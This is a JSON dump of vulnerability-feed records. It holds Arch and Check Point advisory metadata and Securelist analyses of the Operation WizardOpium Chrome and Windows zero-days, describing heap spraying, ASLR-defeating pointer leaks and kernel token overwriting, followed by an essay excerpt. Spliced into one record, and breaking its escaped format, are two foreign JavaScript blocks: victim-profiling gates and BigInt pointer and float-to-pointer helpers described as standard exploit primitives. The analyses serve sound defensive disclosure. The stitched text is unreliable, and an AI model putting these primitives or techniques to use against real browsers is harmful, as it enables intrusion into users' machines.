CVE-2021-21188\nhttps://security.archlinux.org/CVE-2021-21189\nhttps://security.archlinux.org/CVE-2021-21190\nhttps://security.archlinux.org/CVE-2021-21191\nhttps://security.archlinux.org/CVE-2021-21192\nhttps://security.archlinux.org/CVE-2021-21193", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T00:00:00", "type": "archlinux", "title": "[ASA-202103-19] vivaldi: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 8.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193"], "modified": "2021-03-25T00:00:00", "id": "ASA-202103-19", "href": "https://security.archlinux.org/ASA-202103-19", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-24T15:23:33", "description": "A use-after-free vulnerability has been reported in Google Chrome WebAudio. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-25T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome WebAudio Use After Free (CVE-2019-13720)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-11-24T00:00:00", "id": "CPAI-2019-1630", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:32:23", "description": "A heap corruption vulnerability exists in Google Chrome. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2021-21166)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0482", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2019-11-27T10:39:00", "description": "\n\n## Executive summary\n\nKaspersky Exploit Prevention is a component part of Kaspersky products that has successfully detected a number of zero-day attacks in the past. Recently, it caught a new unknown exploit for Google's Chrome browser. We promptly reported this to the Google Chrome security team. After reviewing of the PoC we provided, Google confirmed there was a zero-day vulnerability and assigned it CVE-2019-13720. 
Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux, and we recommend that all Chrome users update to this latest version as soon as possible. You can read Google's bulletin by [clicking here](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>).\n\nKaspersky endpoint products detect the exploit with the help of the exploit prevention component. The verdict for this attack is Exploit.Win32.Generic.\n\nWe are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\n\nMore details about CVE-2019-13720 and recent DarkHotel false flag attacks are available to customers of Kaspersky Intelligence Reporting. For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nThe attack leverages a waterhole-style injection on a Korean-language news portal. Malicious JavaScript code was inserted into the main page, which, in turn, loads a profiling script from a remote site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122729/WizardOpium_CVE-2019-13720_01.png>)\n\n_Redirect to the exploit landing page_\n\nThe main index page hosted a small JavaScript tag that loaded a remote script from hxxp://code.jquery.cdn.behindcorona[.]com/. \n\nThe script then loads another script named _.charlie.XXXXXXXX.js_. 
This JavaScript checks whether the victim's system can be infected by inspecting the browser's user agent: the browser must be running on a _64-bit_ version of _Windows_ and must not be a _WOW64_ (32-bit) process; the script also extracts the browser's name and version. The exploit targets a bug in the _Google Chrome_ browser, so the script checks that the major version is greater than or equal to 65 (the current Chrome version at the time of writing is 78):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122743/WizardOpium_CVE-2019-13720_02.png>)\n\n_Chrome version checks in the profiling script (.charlie.XXXXXXXX.js)_\n\nIf the browser version checks out, the script starts issuing a series of AJAX requests to the attacker-controlled server (_behindcorona[.]com_), with a path name taken from the argument passed to the script (_xxxxxxx.php_). The first request obtains information needed by the later stages: several hex-encoded strings that tell the script how many chunks of the actual exploit code to download from the server, a URL of an image file that embeds a key for the final payload, and an RC4 key for decrypting the chunks of exploit code.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122755/WizardOpium_CVE-2019-13720_03.png>)\n\n_Exploitation chain - AJAX requests to xxxxxxx.php_\n\nAfter downloading all the chunks, the script RC4-decrypts them with the previously retrieved key and concatenates the parts, which yields new JavaScript code containing the full browser exploit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122805/WizardOpium_CVE-2019-13720_04.png>)\n\n_One more version check_\n\nThe browser exploit script is obfuscated; after de-obfuscation we observed a few peculiar things:\n\n 1. 
Another check is made against the user agent string, this time requiring the browser version to be 76 or 77. This could mean that the exploit authors only worked on these versions (the previous stage checked for version 65 or newer) or that other exploits were used in the past for older Chrome versions. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122818/WizardOpium_CVE-2019-13720_05.png>)\n\n_Obfuscated exploit code_\n\n 2. There are a few functions that operate on the browser's built-in _BigInt_ class, which is useful for doing 64-bit arithmetic inside JavaScript code, for example, to work with native pointers in a 64-bit environment. Usually, exploit developers implement their own functions for this by working with pairs of 32-bit numbers. In this case, however, _BigInt_ is used, which should be faster because it is implemented natively in the browser's code. The exploit developers do not use all 64 bits here, but instead operate on a smaller range of numbers; this is why they implement a few functions to work with the higher/lower parts of the number. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122829/WizardOpium_CVE-2019-13720_06.png>)\n\n_Snippet of code to work with 64-bit numbers_\n\n 3. There are many functions and variables that are not used in the actual code. This usually means that they were used for debugging and were then left behind when the code was moved to production.\n 4. The majority of the code uses several classes related to a certain vulnerable component of the browser. As this bug has still not been fixed, we are not including details about the specific vulnerable component here.\n 5. There are a few big arrays of numbers that represent a shellcode block and an embedded PE image.\n\nThe analysis we have provided here is deliberately brief due to vulnerability disclosure principles. 
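The victim-profiling gates described above (64-bit Windows, not WOW64, Chrome 65 or newer, and the exploit's own second gate of Chrome 76 or 77), re-implemented here as an added example in JavaScript. This is not code from the campaign or from the Securelist post: the user-agent strings are constructed samples, the function names are ours, and the 78.0.3904.87 threshold is the fixed build quoted above. Replaying it over web-server access logs shows which visitors the waterhole would have merely profiled and which it would have served the exploit to:

```javascript
// Added example, not code from the campaign or the Securelist post: the victim-profiling
// gates described in the write-up, re-implemented so they can be replayed against logs.
// The user-agent strings are constructed samples; function names are ours.

// Pull out the fields the profiling script keys on: platform bitness and Chrome version.
function parseUserAgent(ua) {
  const m = /Chrome\/(\d+(?:\.\d+)*)/.exec(ua);   // also matches Chromium-based browsers
  return {
    windows: /Windows NT/.test(ua),
    os64: /Win64; x64|WOW64/.test(ua),   // either token means a 64-bit OS
    wow64: /WOW64/.test(ua),             // 32-bit browser process on a 64-bit OS
    chromeVersion: m ? m[1] : null,
    major: m ? parseInt(m[1], 10) : null,
  };
}

// Dotted-version comparison returning -1, 0 or 1. Missing components count as 0.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Stage 1, the .charlie.*.js profiler: 64-bit Windows, not WOW64, Chrome 65 or newer.
function passesProfiling(ua) {
  const p = parseUserAgent(ua);
  return p.windows && p.os64 && !p.wow64 && p.major !== null && p.major >= 65;
}

// Stage 2, inside the decrypted exploit: only Chrome 76 or 77 proceed.
function passesExploitGate(ua) {
  const { major } = parseUserAgent(ua);
  return major === 76 || major === 77;
}

// What the waterhole would have done with a given visitor.
function classify(ua) {
  if (!passesProfiling(ua)) return 'ignored';
  if (!passesExploitGate(ua)) return 'profiled-only';
  return 'exploit-delivered';
}

// Defender-side check against the fixed build named in the post.
const FIXED_CHROME = '78.0.3904.87';
function needsUpdate(ua) {
  const { chromeVersion } = parseUserAgent(ua);
  return chromeVersion !== null && compareVersions(chromeVersion, FIXED_CHROME) < 0;
}

// Constructed sample user agents (not taken from the campaign's logs).
const SAMPLES = {
  target:  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',
  wow64:   'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',
  old:     'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
  patched: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36',
  mac:     'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',
  firefox: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',
};

for (const [name, ua] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(8), classify(ua).padEnd(18), needsUpdate(ua) ? 'needs update' : '');
}
```

Note that the Chrome/ token is also carried by other Chromium-based browsers, so a gate written this way (and, as far as the post describes it, the real one) keys on the engine version rather than the brand; the 32-bit-on-64-bit case is excluded by the WOW64 token, which is why the attacker's UA check cannot be satisfied by a 32-bit Chrome build on a 64-bit host.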
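The BigInt helpers mentioned in item 2 above, written out as an added example that is not the exploit's own code: the high/low 32-bit split, arithmetic masked to 64 bits so offsets wrap like a native register, and the Float64Array/Uint32Array reinterpretation that is the usual way a JavaScript exploit turns a leaked double into a pointer value. The names (hi32, lo32, from32, add64, f64ToU64, pageBase) and the little-endian host assumption are ours.

```javascript
// Added example, not the exploit's code: minimal 64-bit helpers built on BigInt,
// the pattern the post describes for handling native pointers from JavaScript.
// Assumes a little-endian host (x86-64/ARM64), which matches the post's targets.

const MASK32 = 0xffffffffn;
const MASK64 = (1n << 64n) - 1n;

// Split a 64-bit BigInt into its high and low 32-bit halves as plain Numbers.
function hi32(x) { return Number((x >> 32n) & MASK32); }
function lo32(x) { return Number(x & MASK32); }

// Rebuild a 64-bit BigInt from two 32-bit halves (negative Numbers are read as unsigned).
function from32(hi, lo) {
  return ((BigInt(hi >>> 0) << 32n) | BigInt(lo >>> 0)) & MASK64;
}

// Arithmetic that wraps like a 64-bit register, so pointer offsets behave as in native code.
function add64(a, b) { return (a + b) & MASK64; }
function sub64(a, b) { return (a - b) & MASK64; }

// Render as 0x-prefixed, zero-padded hex, the form a leaked address is usually logged in.
function hex64(x) { return '0x' + x.toString(16).padStart(16, '0'); }

// Reinterpret the raw bits of a double as a 64-bit integer and back. Reading a pointer
// through a Float64Array view is the classic source of such leaked values.
const scratch = new ArrayBuffer(8);
const asF64 = new Float64Array(scratch);
const asU32 = new Uint32Array(scratch);

function f64ToU64(f) {
  asF64[0] = f;
  return from32(asU32[1], asU32[0]);  // little-endian: word 1 holds the high half
}

function u64ToF64(x) {
  asU32[0] = lo32(x);
  asU32[1] = hi32(x);
  return asF64[0];
}

// Round an address down to its page, the first step when searching "near" a leaked
// pointer for other useful objects.
function pageBase(addr, pageSize = 0x1000n) {
  return addr & ~(pageSize - 1n) & MASK64;
}

// Demonstration on a constructed (not leaked) address.
const leaked = 0x00007ffe1234abcdn;
console.log(hex64(leaked), hi32(leaked).toString(16), lo32(leaked).toString(16));
console.log(hex64(pageBase(leaked)), hex64(add64(leaked, 0x40n)));
```

The masking matters: BigInt is arbitrary-precision, so without `& MASK64` an offset past the top of the address space would grow instead of wrapping, and a hand-rolled 32-bit-pair implementation of the same thing is exactly where the "higher/lower parts" helpers the post saw come from.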
The exploit used a _race condition_ bug between two threads caused by _missing proper synchronization_ between them. It gives an attacker a _Use-After-Free (UaF)_ condition, which is very dangerous because it can lead to code execution, which is exactly what happens in our case.\n\nThe exploit first tries to trigger the _UaF_ to leak important 64-bit addresses (as pointers). This achieves a few things: 1) if an address is leaked successfully, the exploit is known to be working correctly; 2) the leaked address reveals where the heap/stack is located, which defeats _address space layout randomization (ASLR)_; 3) a few other pointers useful for further exploitation can be located by searching near this address. \n\nAfter that it tries to create a bunch of large objects using a recursive function. This is done to obtain a deterministic heap layout, which is important for successful exploitation. At the same time, it uses a heap spraying technique that aims to reuse the same pointer that was freed earlier in the UaF part. This trick gives the attacker the ability to operate on two different objects (from a JavaScript code perspective) that in reality occupy the same memory region.\n\nThe exploit then performs numerous memory allocate/free operations along with other techniques that eventually give the attackers an arbitrary read/write primitive. 
This is used to craft a special object that can be used with _WebAssembly_ and _FileReader_ together to perform code execution for the embedded shellcode payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122845/WizardOpium_CVE-2019-13720_07.png>)\n\n_First stage shellcode_\n\n## Payload description\n\nThe final payload is downloaded as an encrypted binary (worst.jpg) that is decrypted by the shellcode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01122905/WizardOpium_CVE-2019-13720_08.png>)\n\n_Encrypted payload - worst.jpg_\n\nAfter decryption, the malware module is dropped as updata.exe to disk and executed. For persistence the malware installs tasks in Windows Task Scheduler. \n\nThe payload 'installer' is a RAR SFX archive, with the following information:\n\nFile size: 293,403 \nMD5: 8f3cd9299b2f241daf1f5057ba0b9054 \nSHA256: 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n\nThe archive contains two files:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/01152326/WizardOpium_CVE-2019-13720_code.png>)\n\nFile name: iohelper.exe \nMD5: 27e941683d09a7405a9e806cc7d156c9 \nSHA256: 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n\nFile name: msdisp64.exe \nMD5: f614909fbd57ece81d00b01958338ec2 \nSHA256: cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n\nBoth files were compiled at the same time, which if we are to believe the timestamp, was \"Tue Oct 8 01:49:31 2019\". \nThe main module (msdisp64.exe) tries to download the next stage from a hardcoded C2 server set. The next stages are located on the C2 server in folders with the victim computer names, so the threat actors have information about which machines were infected and place the next stage modules in specific folders on the C2 server. \n\nMore details about this attack are available to customers of Kaspersky Intelligence Reporting. 
For more information, contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>). \n\n## IoCs\n\n * behindcorona[.]com\n * code.jquery.cdn.behindcorona[.]com\n * 8f3cd9299b2f241daf1f5057ba0b9054\n * 35373d07c2e408838812ff210aa28d90e97e38f2d0132a86085b0d54256cc1cd\n * 27e941683d09a7405a9e806cc7d156c9\n * 8fb2558765cf648305493e1dfea7a2b26f4fc8f44ff72c95e9165a904a9a6a48 \n * f614909fbd57ece81d00b01958338ec2\n * cafe8f704095b1f5e0a885f75b1b41a7395a1c62fd893ef44348f9702b3a0deb \n * kennethosborne@protonmail.com", "cvss3": {}, "published": "2019-11-01T16:00:12", "type": "securelist", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-01T16:00:12", "id": "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "href": "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T11:22:50", "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. 
This is done to bypass sandbox restrictions, because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader: parsing PE headers, handling imports/exports, etc. After that, code execution is redirected to the entry point of the DLL, the DllEntryPoint function. The PE code then creates a new thread, which is the entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was a 0-day, because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (newer Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to window switching functionality (for example, the one triggered using the Alt-Tab key combination). That is why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call; the version is then used to select a dozen offsets needed to set up fake kernel GDI objects in memory. 
At the same time, it tries to leak a few kernel pointers using well-known techniques for leaking kernel memory addresses (gSharedInfo, the PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a series of calls to CreateBitmap is performed, and the addresses of the resulting objects are leaked through the handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and the undocumented syscall NtUserMessageCall is invoked with their window handles. In addition, it creates a special window with the task switch window class (#32771), which is required to trigger the exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then, using a call to SetBitmapBits, crafts a GDI object containing a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second call to the undocumented syscall (NtUserMessageCall). That is how it obtains an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It is done by overwriting the token in the EPROCESS structure of the current process with the token value of an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. 
This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "cvss3": {}, "published": "2019-12-10T20:00:39", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-07T10:20:58", "description": "\n\nDespite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.\n\nThis is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society's current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.\n\nWe believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.\n\n## What we do, and how it is failing\n\nKaspersky's Global Research and Analysis Team ([GReAT](<https://www.kaspersky.com/about/team>)) is made up of cybersecurity researchers. Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. 
Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard \u2013 from [awareness raising](<https://bestinau.com.au/kasperskys-greats-david-emm-and-david-jacoby-the-importance-of-cyber-security/>) and [media interviews](<https://arstechnica.com/information-technology/2020/08/chinese-hackers-have-pillaged-taiwans-semiconductor-industry/>) to [embedded firmware reverse engineering](<https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/>), as well as [incident-response support](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>), [vulnerabilities research](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>), [malicious infrastructure hunting](<https://securelist.com/the-roof-is-on-fire-tackling-flames-cc-servers/33033/>), code similarity [heuristics development](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>), discovery of major threat actors or [advanced malicious frameworks](<https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/>), [open-sourced tools](<https://securelist.com/your-new-friend-klara/85046/>), [specialized training](<https://xtraining.kaspersky.com/>) and expert talks at [world-class conferences](<https://thesascon.com/>). As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.\n\nYet, somehow, we are still failing. 
Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, [keep skyrocketing](<https://securelist.com/all/?category=437>) every year. Cybercrime has never been [so prevalent](<https://www.forbes.com/sites/daveywinder/2020/02/13/the-fbi-issues-a-powerful-35-billion-cybercrime-warning/>) and [real](<https://www.rt.com/uk/495293-cybercrime-on-rise-23-percent/>), reaching every possible device, from [IoT](<https://securelist.com/iot-a-malware-story/94451/>) to [supercomputers](<https://securelist.com/apt-trends-report-q2-2020/97937/>), as well as [network routers](<https://securelist.com/new-wave-of-mirai-attacking-home-routers/76791/>), [smartphones](<https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/>) and [personal computers](<https://securelist.com/bots-and-botnets-in-2018/90091/>). Cyberattacks have become a go-to companion, wherever there is malicious intent to [tackle competition](<https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/>), [hijack accounts](<https://securelist.com/who-viewed-you-instagram-account-and-who-stole-your-password/74260/>), [spy on a partner](<https://securelist.com/monitorminor-vicious-stalkerware/95575/>), [persecute a minority](<https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/>), [disrupt critical infrastructure](<https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/>), [influence electoral processes](<https://www.intelligence.senate.gov/sites/default/files/documents/report_volume5.pdf>), [steal knowledge](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>) or [obtain money](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>). 
Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities [are being developed](<https://www.nasdaq.com/articles/so-who-has-most-advanced-cyber-warfare-technology-2017-10-19>), and kinetic force could be used as a response to cyberattacks whenever [deemed fit](<https://fas.org/irp/eprint/dod-cyber.pdf>). And [ransomware](<https://home.kpmg/xx/en/home/insights/2020/05/rise-of-ransomware-during-covid-19.html>) or [state-sponsored cyberattacks](<https://www.ncsc.gov.uk/news/covid-19-exploited-by-cyber-actors-advisory>) kept hitting hard even when we are all confronted with a pandemic.

## Our hypotheses and beliefs

Why does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.

### A lack of global willpower and instruments

First of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being [should be guaranteed](<https://www.ohchr.org/EN/ProfessionalInterest/Pages/InternationalLaw.aspx>) a minimum set of rights, that the development of nuclear warheads [should be limited](<https://www.un.org/disarmament/wmd/nuclear/npt/>), if [not](<https://www.newsweek.com/nuclear-weapons-illegal-nobel-prize-679688>) outlawed, or that warfare [should be regulated and overseen](<https://www.icrc.org/en/war-and-law>).
These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.

